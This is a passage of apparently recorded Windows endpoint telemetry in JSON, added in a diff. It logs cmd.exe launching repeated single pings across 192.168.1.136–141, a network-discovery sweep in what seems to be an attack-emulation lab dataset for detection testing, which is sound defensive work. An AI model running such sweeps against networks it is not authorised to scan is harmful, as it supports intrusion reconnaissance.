"C:\\Windows\\System32\\ws2_32.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "process", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572646830000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.136", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5316, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "registry", 
+ "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572649330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572649330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572649330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "process", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572651830000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.137", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6876, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}", + "unique_ppid": 
"{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": 
"{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "process", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572656990000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.138", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", 
+ "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6848, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572657130000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + 
}, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657300000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657300000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657300000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "process", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572661840000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.139", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3956, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + 
"event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3956, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "process", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572666990000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.140", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3960, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572667130000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": 
"KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3960, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667300000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "process", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572671830000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.141", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8164, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "process", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 